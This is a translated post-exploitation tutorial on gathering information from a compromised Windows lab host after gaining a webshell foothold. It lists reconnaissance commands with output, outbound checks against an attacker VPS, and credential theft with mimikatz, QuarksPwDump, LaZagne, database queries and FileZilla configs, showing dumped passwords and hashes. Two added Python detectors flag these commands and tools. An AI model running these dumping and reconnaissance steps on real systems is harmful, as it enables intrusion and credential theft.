2025-01-16 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/03 Report--
This article mainly introduces how to carry out single-host ("stand-alone") information collection. Many people have doubts about this in daily operation, so the editor consulted various materials and sorted out simple, practical methods. I hope it helps answer your doubts about host information collection. Please follow the editor and read on!
Thinking
When we obtain a webshell, or gain initial access through phishing, we need to collect information about the current machine before going any further, and not only the machine's configuration information.
The main questions to think about are:
What information should be collected?
How is this information collected?
Why collect this information (what is it used for, and where)?
Answers and the information-collection list
Local configuration information: network configuration, domain membership, system configuration, outbound connectivity, port and connection information, services, processes, installed software, hosts file, environment variables
Account passwords: local account passwords, other accounts in the domain, database passwords, SSH passwords, remote login passwords, WiFi passwords, passwords in service configuration files, passwords in backup files, etc.
Other information: browser history and bookmarks, commonly used file locations, etc.
Collection methods and purpose
Local configuration information
1. Network configuration
[IP, gateway, mask, DNS suffix]: mainly used to learn the network configuration, which helps with building tunnels and understanding the size of the current network segment.
ipconfig /all

PS C:\Users\Administrator> ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : WIN-DC
   Primary Dns Suffix  . . . . . . . : langke.org
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : langke.org

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-95-22-43
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::ed4c:c67:a2b6:7a38(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.4.3(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 301993001
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-27-5B-EF-6E-00-0C-29-95-22-43
   DNS Servers . . . . . . . . . . . : ::1
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{9A2D7433-2455-4F1A-9314-BBC3C6939A99}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
[DNS cache]
ipconfig /displaydns

PS C:\Users\Administrator> ipconfig /displaydns

Windows IP Configuration

    _ldap._tcp.win-dc.langke.org
    ----------------------------------------
    Name does not exist.

    542906ca-9ac1-4fa5-b9d4-d1c60954df6c._msdcs.langke.org
    ----------------------------------------
    Record Name . . . . . : 542906ca-9ac1-4fa5-b9d4-d1c60954df6c._msdcs.langke.org
    Record Type . . . . . : 5
    Time To Live  . . . . : 144
    Data Length . . . . . : 8
    Section . . . . . . . : Answer
    CNAME Record  . . . . : win-dc.langke.org

    isatap
    ----------------------------------------
    Name does not exist.

    wpad
    ----------------------------------------
    Name does not exist.

    _ldap._tcp.default-first-site-name._sites.win-dc.langke.org
    ----------------------------------------
    Name does not exist.
[Routing table]
route print

PS C:\Users\Administrator> route print
===========================================================================
Interface List
 12...00 0c 29 95 22 43 ......Intel(R) 82574L Gigabit Network Connection
  1...........................Software Loopback Interface 1
 13...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    306
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    306
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    306
      192.168.4.0    255.255.255.0         On-link       192.168.4.3    266
      192.168.4.3  255.255.255.255         On-link       192.168.4.3    266
    192.168.4.255  255.255.255.255         On-link       192.168.4.3    266
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link       192.168.4.3    266
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    306
  255.255.255.255  255.255.255.255         On-link       192.168.4.3    266
===========================================================================
Persistent Routes:
  None

IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
  1    306 ::1/128                  On-link
 12    266 fe80::/64                On-link
 12    266 fe80::ed4c:c67:a2b6:7a38/128
                                    On-link
  1    306 ff00::/8                 On-link
 12    266 ff00::/8                 On-link
===========================================================================
Persistent Routes:
  None
[ARP table]: read the ARP cache to find more live hosts in the internal network.
arp -a

PS C:\Users\Administrator> arp -a

Interface: 192.168.4.3 --- 0xc
  Internet Address      Physical Address      Type
  192.168.4.100         00-0c-29-11-83-25     dynamic
  192.168.4.101         00-0c-29-dd-e4-ef     dynamic
  192.168.4.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.252           01-00-5e-00-00-fc     static
2. Domain membership
[hostname, domain information]: check whether the current host is joined to a domain; if it is, go on to collect information about that domain.
net config workstation

PS C:\Users\Administrator> net config workstation
Computer name                        \\WIN-DC
Full Computer name                   WIN-DC.langke.org
User name                            Administrator

Workstation active on
        NetBT_Tcpip_{9A2D7433-2455-4F1A-9314-BBC3C6939A99} (000C29952243)

Software version                     Windows Server 2012 R2 Standard

Workstation domain                   LANGKE
Workstation Domain DNS Name          langke.org
Logon domain                         LANGKE

COM Open Timeout (sec)               0
COM Send Count (byte)                16
COM Send Timeout (msec)              250
The command completed successfully.
3. System configuration
[system name, version, bitness, boot time, whether it is a virtual machine and which hypervisor]: understand the basic system information, mainly to help choose tools and to account for behaviour that changed between Windows versions. For example, from Server 2012 onward the plaintext password can no longer be read by default; you can only read the password hash, or change the registry and restart.
systeminfo

PS C:\Users\Administrator> systeminfo

Host Name:                 WIN-DC
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00252-70000-00000-AA581
Original Install Date:     2019-10-21 23:12:01
System Boot Time:          2020-12-4 23:36:58
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~
                           [02]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~
BIOS Version:              Phoenix Technologies LTD 6.00, 2018/4/13
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             zh-cn;Chinese (China)
Input Locale:              zh-cn;Chinese (China)
Time Zone:                 (UTC+08:00) Beijing, Chongqing, Hong Kong SAR, Urumqi
Total Physical Memory:     2,047 MB
Available Physical Memory: 846 MB
Virtual Memory: Max Size:  6,655 MB
Virtual Memory: Available: 5,255 MB
Virtual Memory: In Use:    1,400 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    langke.org
Logon Server:              \\WIN-DC
Hotfix(s):                 110 Hotfix(s) Installed.
                           [01]: KB2894852
                           [02]: KB2894856
                           [03]: KB2919355
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) 82574L Gigabit Network Connection
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.4.3
                                 [02]: fe80::ed4c:c67:a2b6:7a38
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
4. Outbound connectivity
[TCP, ICMP, UDP, DNS]: find out whether the host can reach the external network, mainly to support proxy building, data transfer, etc.
telnet vps_ip 80
ping vps_ip
nc -u vps_ip 53
nslookup www.baidu.com
5. Port and connection information
[open ports, connection information]: mainly used to collect which ports are open, to guide further penetration. For example, port 3389 can be used to connect directly to the desktop, and port 1433 to collect further information.
netstat -ano

C:\Users\lisi> netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       728
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:554            0.0.0.0:0              LISTENING       2992
  TCP    0.0.0.0:2869           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:10243          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       400
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       780
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       948
  TCP    0.0.0.0:49159          0.0.0.0:0              LISTENING       504
  TCP    0.0.0.0:64849          0.0.0.0:0              LISTENING       512
  TCP    192.168.4.101:139      0.0.0.0:0              LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       728
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:554               [::]:0                 LISTENING       2992
  TCP    [::]:2869              [::]:0                 LISTENING       4
  TCP    [::]:5357              [::]:0                 LISTENING       4
  TCP    [::]:10243             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       400
  TCP    [::]:49153             [::]:0                 LISTENING       780
  TCP    [::]:49154             [::]:0                 LISTENING       948
  TCP    [::]:49159             [::]:0                 LISTENING       504
  TCP    [::]:64849             [::]:0                 LISTENING       512
  UDP    0.0.0.0:123            *:*                                    596
  UDP    0.0.0.0:3702           *:*                                    1456
  UDP    0.0.0.0:3702           *:*                                    1456
  UDP    0.0.0.0:5004           *:*                                    2992
  UDP    0.0.0.0:5005           *:*                                    2992
  UDP    0.0.0.0:5355           *:*                                    1052
  UDP    0.0.0.0:55527          *:*                                    1456
  UDP    127.0.0.1:1900         *:*                                    1456
  UDP    127.0.0.1:55531        *:*                                    1052
  UDP    127.0.0.1:58374        *:*                                    948
  UDP    192.168.4.101:137      *:*                                    4
  UDP    192.168.4.101:1900     *:*                                    1456
  UDP    [::]:3702              *:*                                    1456
  UDP    [::]:3702              *:*                                    1456
  UDP    [::]:5004              *:*                                    2992
  UDP    [::]:5005              *:*                                    2992
  UDP    [::]:5355              *:*                                    1052
  UDP    [::]:55528             *:*                                    1456
  UDP    [::1]:1900             *:*                                    1456
  UDP    [::1]:60695            *:*                                    1456
  UDP    [fe80::d4b6:7c0:d036:7e77]:1900   *:*                         1456
  UDP    [fe80::d4b6:7c0:d036:7e77]:60694  *:*                         1456
6. Patches
[patch URL, ID, date]: collect the patches installed on the system; this is generally used to find the matching exploit during privilege escalation.
wmic qfe get Caption,Description,HotFixID,InstalledOn

C:\Users\Administrator> wmic qfe get Caption,Description,HotFixID,InstalledOn
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=2534111  Hotfix           KB2534111  1/27/2020
http://support.microsoft.com/?kbid=2621440  Security Update  KB2621440  12/4/2020
http://support.microsoft.com/?kbid=2653956  Security Update  KB2653956  12/4/2020
http://support.microsoft.com/?kbid=2943357  Security Update  KB2943357  6/24/2020
http://support.microsoft.com/?kbid=2999226  Update           KB2999226  1/27/2020
http://support.microsoft.com/?kbid=3097989  Security Update  KB3097989  6/24/2020
http://support.microsoft.com/?kbid=4019990  Update           KB4019990  12/4/2020
http://support.microsoft.com/?kbid=4040980  Update           KB4040980  12/4/2020
http://support.microsoft.com                Update           KB958488   2/9/2020
http://support.microsoft.com/?kbid=976902   Update           KB976902   11/21/2010
7. Services
[service name, start mode, path name]: collect the services running on the current system, mainly to check for antivirus, monitoring software, web services and database services.
wmic service where (state="running") get caption,name,startmode,pathname

C:\Users\Administrator> wmic service where (state="running") get caption,name,startmode,pathname
Caption                                   Name                  PathName                                                                        StartMode
Active Directory Web Services             ADWS                  C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe                       Auto
Base Filtering Engine                     BFE                   C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork                        Auto
Background Intelligent Transfer Service   BITS                  C:\Windows\System32\svchost.exe -k netsvcs                                      Auto
Background Tasks Infrastructure Service   BrokerInfrastructure  C:\Windows\System32\svchost.exe -k DcomLaunch                                   Auto
Computer Browser                          Browser               C:\Windows\System32\svchost.exe -k netsvcs                                      Auto
COM+ System Application                   COMSysApp             C:\Windows\System32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}  Manual
Cryptographic Services                    CryptSvc              C:\Windows\system32\svchost.exe -k NetworkService                               Auto
DCOM Server Process Launcher              DcomLaunch            C:\Windows\system32\svchost.exe -k DcomLaunch                                   Auto
DFS Namespace                             Dfs                   C:\Windows\system32\dfssvc.exe                                                  Auto
DFS Replication                           DFSR                  C:\Windows\system32\DFSRs.exe                                                   Auto
DHCP Client                               Dhcp                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted                Auto
DHCP Server                               DHCPServer            C:\Windows\system32\svchost.exe -k DHCPServer                                   Auto
Diagnostics Tracking Service              DiagTrack             C:\Windows\System32\svchost.exe -k utcsv
8. Processes
[process name, PID, corresponding service]: collect the processes currently running on the system, paying attention to antivirus, monitoring software, remote management tools, etc.
tasklist /svc

C:\Users\Administrator> tasklist /svc

Image Name                     PID Services
========================= ======== ============================================
lsass.exe                      504 Kdc, Netlogon, NTDS, SamSs
svchost.exe                    636 BrokerInfrastructure, DcomLaunch, LSM, PlugPlay, Power, SystemEventsBroker
svchost.exe                    680 RpcEptMapper, RpcSs
dwm.exe                        776 N/A
vmacthlp.exe                   796 VMware Physical Disk Helper Service
svchost.exe                    860 Dhcp, EventLog, lmhosts, Wcmsvc
svchost.exe                    892 BITS, Browser, DsmSvc, gpsvc, IKEEXT, iphlpsvc, LanmanServer, ProfSvc, Schedule, SENS, ShellHWDetection, Themes, Winmgmt
svchost.exe                    940 EventSystem, FontCache, netprofm, nsi, W32Time
svchost.exe                   1012 CryptSvc, Dnscache, LanmanWorkstation, NlaSvc, WinRM
svchost.exe                    736 BFE, DPS, MpsSvc
spoolsv.exe                   1340 Spooler
Microsoft.ActiveDirectory     1372 ADWS
dfsrs.exe                     1412 DFSR
svchost.exe                   1452 DHCPServer
svchost.exe                   1472 DiagTrack
dns.exe                       1488 DNS
ismserv.exe                   1508 IsmServ
MsDtsSrvr.exe                 1724 MsDtsServer110
SMSvcHost.exe                 1880 NetTcpPortSharing
sqlbrowser.exe                1932 SQLBrowser
sqlwriter.exe                 2000 SQLWriter
ServerManager.exe             3536 N/A
vmtoolsd.exe                  1984 N/A
mmc.exe                       1872 N/A
powershell.exe                1428 N/A
conhost.exe                   1776 N/A
cmd.exe                       1076 N/A
tasklist.exe                  3948
9. Installed software
[software, version]: the list collected by this command may be incomplete, but it gives a general picture of the installed software. It can be used for privilege escalation and for leaving a backdoor, for example the earlier Sogou input method case.
wmic product get name,version

C:\Users\Administrator> wmic product get name,version
Name                                                            Version
Microsoft Application Error Reporting                           12.0.6012.5000
Microsoft SQL Server System CLR Types                           10.51.2500.0
SQL Server 2012 Client Tools                                    11.0.2100.60
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4974  9.0.30729.4974
SQL Server 2012 Documentation Components                        11.0.2100.60
Microsoft SQL Server 2012 Data-Tier Application Framework       11.0.2100.60
SQL Server 2012 Master Data Services                            11.0.2100.60
Microsoft SQL Server 2012 Native Client                         11.0.2100.60
SQL Server 2012 Database Engine Services                        11.0.2100.60
Microsoft System CLR Types for SQL Server 2012                  11.0.2100.60
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219      10.0.40219
SQL Server 2012 Distributed Replay                              11.0.2100.60
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.12.25810  14.12.25810
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219      10.0.40219
Microsoft SQL Server 2012 Management Objects                    11.0.2100.60
VMware Tools                                                    10.3.2.9925305
SQL Server 2012 Integration Services                            11.0.2100.60
Microsoft VSS Writer for SQL Server 2012                        11.0.2100.60
Visual Studio 2010 Prerequisites - English                      10.0.40219
SQL Server 2012 Distributed Replay                              11.0.2100.60
10. Hosts file
[hosts file]: the system's hosts file may reveal some hidden internal assets.
C:\Windows\System32\drivers\etc\hosts

C:\Users\Administrator> type C:\Windows\System32\drivers\etc\hosts
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost
11. Environment variables
[environment variables]: collect the system's environment variables, mainly to see which scripts, interpreters and programs are available.
path

C:\Users\Administrator> path
PATH=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft SQL Server\110\DTS\Binn\;C:\Program Files (x86)\Microsoft SQL Server\110\Tools\Binn\ManagementStudio\;C:\Program Files (x86)\Microsoft SQL Server\110\Tools\Binn\;C:\Program Files\Microsoft SQL Server\Tools\Binn\;C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\PrivateAssemblies\;C:\Program Files (x86)\Microsoft SQL Server\110\DTS\Binn\
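The commands in sections 1 to 11 leave a recognisable trail in process-creation telemetry. As an added example (not code from the original article), the Python checker below raises an alert when several distinct discovery commands run inside one logon session within a few minutes, which is what a webshell or a phishing foothold doing this collection looks like to a defender. Field names follow Sysmon Event ID 1; the sample events, logon IDs, threshold and window are assumptions made for the example.

```python
"""Detect a host-discovery command burst in process-creation events.

Added example, not code from the original article. It flags the
collection commands above (ipconfig, route, arp, net config,
systeminfo, netstat, wmic, tasklist, netsh, nslookup) when several
distinct ones run inside one logon session within a short window.
Events use Sysmon Event ID 1 style fields (Image, CommandLine,
LogonId, User); the sample events are constructed for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# (image name, required command-line fragment) for the commands listed above.
DISCOVERY = [
    ("ipconfig.exe", ""), ("route.exe", "print"), ("arp.exe", "-a"),
    ("net.exe", "config"), ("systeminfo.exe", ""), ("netstat.exe", "-ano"),
    ("wmic.exe", "qfe"), ("wmic.exe", "service"), ("wmic.exe", "product"),
    ("tasklist.exe", "/svc"), ("netsh.exe", "firewall"), ("nslookup.exe", ""),
]
THRESHOLD = 4                  # distinct discovery commands ...
WINDOW = timedelta(minutes=5)  # ... inside this span raise an alert


def classify(event):
    """Map one event to a discovery tag such as 'wmic qfe', or None."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    cmdline = event["CommandLine"].lower()
    for exe, frag in DISCOVERY:
        if image == exe and frag in cmdline:
            return f"{exe[:-4]} {frag}".strip()
    return None


def find_bursts(events, threshold=THRESHOLD, window=WINDOW):
    """Group discovery hits by logon session and return one alert per session.

    Grouping by LogonId rather than parent PID matters: a webshell runs
    each command through a fresh 'cmd.exe /c', so parents differ while
    the session (the app-pool identity) stays the same.
    """
    by_session = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        tag = classify(ev)
        if tag:
            by_session[(ev["LogonId"], ev["User"])].append((ev["UtcTime"], tag))
    alerts = []
    for (logon_id, user), hits in by_session.items():
        for i, (start, _) in enumerate(hits):
            tags = sorted({tag for t, tag in hits[i:] if t - start <= window})
            if len(tags) >= threshold:
                alerts.append({"logon_id": logon_id, "user": user,
                               "first_seen": start, "commands": tags})
                break
    return alerts


def _ev(ts, image, cmdline, logon="0x2f5a1", user=r"IIS APPPOOL\DefaultAppPool"):
    return {"UtcTime": datetime.fromisoformat(ts), "Image": image,
            "CommandLine": cmdline, "LogonId": logon, "User": user}


# Constructed sample: six discovery commands from a web app-pool session in
# 80 seconds, then one ipconfig from an interactive administrator logon.
SAMPLE_EVENTS = [
    _ev("2020-12-04 23:40:01", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    _ev("2020-12-04 23:40:09", r"C:\Windows\System32\ROUTE.EXE", "route print"),
    _ev("2020-12-04 23:40:15", r"C:\Windows\System32\ARP.EXE", "arp -a"),
    _ev("2020-12-04 23:40:31", r"C:\Windows\System32\systeminfo.exe", "systeminfo"),
    _ev("2020-12-04 23:41:02", r"C:\Windows\System32\wbem\WMIC.exe",
        "wmic qfe get Caption,Description,HotFixID,InstalledOn"),
    _ev("2020-12-04 23:41:20", r"C:\Windows\System32\tasklist.exe", "tasklist /svc"),
    _ev("2020-12-04 23:50:00", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all",
        logon="0x4a2b1", user=r"LANGKE\Administrator"),
]

if __name__ == "__main__":
    for alert in find_bursts(SAMPLE_EVENTS):
        print(f"{alert['user']} ({alert['logon_id']}) at {alert['first_seen']}: "
              + ", ".join(alert["commands"]))
```

The single administrator `ipconfig` stays below the threshold, so only the app-pool session is reported.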
12. Firewall configuration rules
[firewall rules]: collect the system's firewall configuration and look at the inbound and outbound rules.
netsh firewall show config

C:\Users\Administrator> netsh firewall show config

Domain profile configuration:
-------------------------------------------------------------------
Operational mode                  = Disable
Exception mode                    = Enable
Multicast/broadcast response mode = Enable
Notification mode                 = Disable

Service configuration for Domain profile:
Mode     Customized  Name
-------------------------------------------------------------------
Enable   No          File and Printer Sharing

Allowed programs configuration for Domain profile:
Mode     Traffic direction    Name / Program
-------------------------------------------------------------------

Port configuration for Domain profile:
Port   Protocol  Mode    Traffic direction     Name
-------------------------------------------------------------------
1688   TCP       Enable  Inbound               HEU_KMS_Service

Account passwords
1. Local account password
Local users
net user

C:\Users\Administrator> net user

User accounts for \\WIN-DC
-------------------------------------------------------------------------------
Administrator            Guest                    john
krbtgt                   lisi
The command completed successfully.
Logged-on users
query user

C:\Users\Administrator> query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>administrator         console             1  Active      none   2020-12-4 23:38
Passwords
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords full" exit

C:\Users\lisi\Desktop> mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords full" exit

  .#####.   mimikatz 2.2.0 (x64) #17763 Mar 25 2019 01:42:05
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # log
Using 'mimikatz.log' for logfile : OK

mimikatz(commandline) # sekurlsa::logonpasswords full

Authentication Id : 0 ; 1931626 (00000000:001d796a)
Session           : Interactive from 2
User Name         : administrator
Domain            : LANGKE
Logon Server      : WIN-DC
Logon Time        : 2020-12-5 0:20:14
SID               : S-1-5-21-2022301354-2747916058-908538118-500
        msv :
         [00000003] Primary
         * Username   : Administrator
         * Domain     : LANGKE
         * LM         : 629ea9eacefe7125c187b8085fe1d9df
         * NTLM       : 2723e394bfa34a878b638852b4e37335
         * SHA1       : 87af129263c193d09d6cade355c50a2d415cabe7
        tspkg :
         * Username   : Administrator
         * Domain     : LANGKE
         * Password   : 2wsx@WSX
        wdigest :
         * Username   : Administrator
         * Domain     : LANGKE
         * Password   : 2wsx@WSX
        kerberos :
         * Username   : administrator
         * Domain     : LANGKE.ORG
         * Password   : 2wsx@WSX
        ssp :
        credman :

Authentication Id : 0 ; 630324 (00000000:00099e34)
Session           : Interactive from 2
User Name         : lisi
Domain            : LANGKE
Logon Server      : WIN-DC
Logon Time        : 2020-12-4 23:45:44
SID               : S-1-5-21-2022301354-2747916058-908538118-1116
Hashes
QuarksPwDump.exe

// local hashes
C:\Users\Administrator\Desktop> QuarksPwDump.exe -dhl
[+] Setting BACKUP and RESTORE privileges...[OK]
[+] Parsing SAM registry hive...[OK]
[+] BOOTKEY retrieving...[OK]
BOOTKEY = D61E03DA80125215915636F578505991
----BEGIN DUMP----
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:BC007082D32777855E253FD4DEFE70EE:::
----END DUMP----
2 dumped accounts

// domain cached hashes
C:\Users\Administrator\Desktop> QuarksPwDump.exe -dhdc
[+] SYSKEY retrieving...[OK]
SYSKEY = 20242EE7E4AABBF78F48427B90233C50
[+] Setting BACKUP and RESTORE privileges...[OK]
[+] Parsing SECURITY registry hive...[OK]
[+] LSAKEY(s) retrieving...[OK]
LSAKEY = 708EBC555B43CA7C87FFEB7A46B41797C93D48746571F72838CA61E4D9F72CC1
[+] NLKM retrieving...[OK]
NL$KM = 5AA3BF230BD33D6CAE9F8ED398C50E336DD59357DCEBD64316ADD33B6183BF5F20CB880B7E664D68319673D10315EFF643934B4440DF911AF41239E7DA82A313
No cached domain password found!
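The local-password steps above read secrets from LSASS memory (sekurlsa::logonpasswords), from the SAM hive (QuarksPwDump -dhl) and, on Server 2012 and later, depend on the WDigest registry change mentioned in the system configuration section. As an added example (not code from the original article or from either tool), the checker below shows what those steps look like in Sysmon telemetry: Event 10 process access to lsass.exe with read rights, Event 13 setting WDigest UseLogonCredential, and Event 1 command lines carrying the tool syntax. The PROCESS_* constants are the standard Windows access rights; the event records and the source-image allowlist are constructed for the example and would be tuned per host.

```python
"""Flag credential-dumping traces in Sysmon events.

Added example, not code from the original article. The checks cover
the three traces left by the local-password steps above: an lsass.exe
memory read (Event 10), WDigest being re-enabled (Event 13) and the
dumping tools' command lines (Event 1). All event data and the
allowlist are constructed for this example.
"""
import re

# Access rights a credential reader needs on lsass.exe: PROCESS_VM_READ plus
# PROCESS_QUERY_INFORMATION or PROCESS_QUERY_LIMITED_INFORMATION.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_ANY = 0x0400 | 0x1000

# Source images that legitimately read lsass on this host (assumed; tune per environment).
LSASS_ALLOWLIST = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\wbem\wmiprvse.exe",
}

# Command-line fragments of the tools used above (mimikatz modules, QuarksPwDump).
DUMP_CMDLINE = re.compile(r"sekurlsa::|privilege::debug|lsadump::|quarkspwdump", re.I)


def check_event(ev):
    """Return (reason, detail) if the event looks like credential dumping, else None."""
    eid = ev["EventID"]
    if eid == 10 and ev["TargetImage"].lower().endswith("\\lsass.exe"):
        access = int(ev["GrantedAccess"], 16)
        source = ev["SourceImage"].lower()
        if (access & PROCESS_VM_READ and access & PROCESS_QUERY_ANY
                and source not in LSASS_ALLOWLIST):
            return ("lsass_read", f"{ev['SourceImage']} GrantedAccess=0x{access:x}")
    if eid == 13 and ev["TargetObject"].lower().endswith("\\wdigest\\uselogoncredential"):
        # Sysmon renders the new DWORD as 'DWORD (0x00000001)'.
        if ev["Details"].lower().startswith("dword (0x00000001)"):
            return ("wdigest_enabled", ev["TargetObject"])
    if eid == 1 and DUMP_CMDLINE.search(ev["CommandLine"]):
        return ("dump_cmdline", ev["CommandLine"])
    return None


def scan(events):
    """Run check_event over a batch and return the list of (reason, detail) hits."""
    hits = []
    for ev in events:
        hit = check_event(ev)
        if hit:
            hits.append(hit)
    return hits


# Constructed sample events mirroring the session above on the lab host WIN-DC.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Users\lisi\Desktop\mimikatz.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\system32\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 13, "Details": "DWORD (0x00000001)", "TargetObject":
     r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential"},
    {"EventID": 1, "CommandLine":
     'mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords full" exit'},
    {"EventID": 1, "CommandLine": "QuarksPwDump.exe -dhl"},
    {"EventID": 1, "CommandLine": "tasklist /svc"},
]

if __name__ == "__main__":
    for reason, detail in scan(SAMPLE_EVENTS):
        print(f"{reason:16} {detail}")
```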
2. Other accounts in the domain
Domain users
net user /domain

C:\Users\Administrator\Desktop> net user /domain

User accounts for \\WIN-DC
-------------------------------------------------------------------------------
Administrator            Guest                    john
krbtgt                   lisi
The command completed successfully.

Machines currently online in the domain
net view

C:\Users\Administrator\Desktop> net view
Server Name            Remark
-------------------------------------------------------------------------------
\\WIN-DC
\\WIN-OA41MD9F1FJ
The command completed successfully.

Domain administrators in the current domain
net group "domain admins" /domain

C:\Users\Administrator\Desktop> net group "domain admins" /domain
Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
Administrator
The command completed successfully.
3. Passwords in databases
[MySQL]
select name,password from mysql.user
[MSSQL]
SELECT name, password_hash FROM master.sys.sql_logins
4. Passwords saved by browsers, remote login passwords, credentials saved by Windows, WiFi passwords, etc.
LaZagne.exe
5. Information saved by FileZilla
[host, port, account, password]
type %appdata%\FileZilla\filezilla.xml | findstr /c:"Host" /c:"Pass" /c:"Port" /c:"User"

C:\Users\Administrator> type %appdata%\FileZilla\filezilla.xml | findstr /c:"Host" /c:"Pass" /c:"Port" /c:"User"
C:\Users\john\AppData\Roaming\FileZilla\
21
C:\Users\john\
127.0.0.1
21
admin
MTIzNDU2Nzg=
6. Information saved by management tools
Navicat
